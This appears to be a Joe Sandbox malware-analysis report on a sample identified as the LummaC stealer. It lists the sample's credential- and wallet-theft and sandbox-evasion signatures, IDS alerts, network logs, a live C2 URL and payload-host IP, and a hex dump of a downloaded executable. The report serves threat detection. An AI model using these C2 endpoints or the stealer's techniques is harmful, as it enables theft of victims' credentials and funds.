Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1566421
MD5:91042593292baba6ce50f767911859e1
SHA1:796f59e5a82da5d08924cdf7f58940fca0a57fca
SHA256:9bdd12b721e1b358cb1931a7261d31bd86f6d31eb059c0afbe4cb5e8f1d3be7f
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 91042593292BABA6CE50F767911859E1)
    • chrome.exe (PID: 2352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1828,i,11464838882767469421,13980832017172917232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7280 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1988,i,12511401562534462833,16217488018526680522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://atten-supporse.biz/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1594408142.00000000011E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1624888871.00000000011EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1541778568.00000000011EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1594686688.00000000011EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: file.exe PID: 6376JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:27.586130+010020283713Unknown Traffic192.168.2.849705104.21.16.9443TCP
                2024-12-02T07:37:29.836272+010020283713Unknown Traffic192.168.2.849706104.21.16.9443TCP
                2024-12-02T07:37:32.299891+010020283713Unknown Traffic192.168.2.849707104.21.16.9443TCP
                2024-12-02T07:37:34.696223+010020283713Unknown Traffic192.168.2.849708104.21.16.9443TCP
                2024-12-02T07:37:37.581274+010020283713Unknown Traffic192.168.2.849709104.21.16.9443TCP
                2024-12-02T07:37:40.719722+010020283713Unknown Traffic192.168.2.849713104.21.16.9443TCP
                2024-12-02T07:37:43.293582+010020283713Unknown Traffic192.168.2.849716104.21.16.9443TCP
                2024-12-02T07:37:51.942034+010020283713Unknown Traffic192.168.2.849718104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:28.409863+010020546531A Network Trojan was detected192.168.2.849705104.21.16.9443TCP
                2024-12-02T07:37:30.651859+010020546531A Network Trojan was detected192.168.2.849706104.21.16.9443TCP
                2024-12-02T07:37:53.034206+010020546531A Network Trojan was detected192.168.2.849718104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:28.409863+010020498361A Network Trojan was detected192.168.2.849705104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:30.651859+010020498121A Network Trojan was detected192.168.2.849706104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:54.583004+010020197142Potentially Bad Traffic192.168.2.849719185.215.113.1680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T07:37:41.483099+010020480941Malware Command and Control Activity Detected192.168.2.849713104.21.16.9443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: file.exe.6376.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz/api", "Build Version": "LOGS11--LiveTraffi"}
                Source: file.exeReversingLabs: Detection: 36%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49825 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49819 version: TLS 1.2
                Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1849742548.00000000082B0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1947965079.0000000006362000.00000040.00000800.00020000.00000000.sdmp

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49713 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49718 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.16.9:443
                Source: Malware configuration extractorURLs: https://atten-supporse.biz/api
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 06:37:54 GMTContent-Type: application/octet-streamContent-Length: 2848256Last-Modified: Mon, 02 Dec 2024 06:31:04 GMTConnection: keep-aliveETag: "674d5428-2b7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 cb 07 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 6c 66 6c 6a 6e 64 72 00 20 2b 00 00 a0 00 00 00 16 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 63 79 69 65 76 6a 78 00 20 00 00 00 c0 2b 00 00 04 00 00 00 50 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2b 00 00 22 00 00 00 54 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49719 -> 185.215.113.16:80
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49825 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MWU5ENCar6voP1d&MD=YsvgaaP4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MWU5ENCar6voP1d&MD=YsvgaaP4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
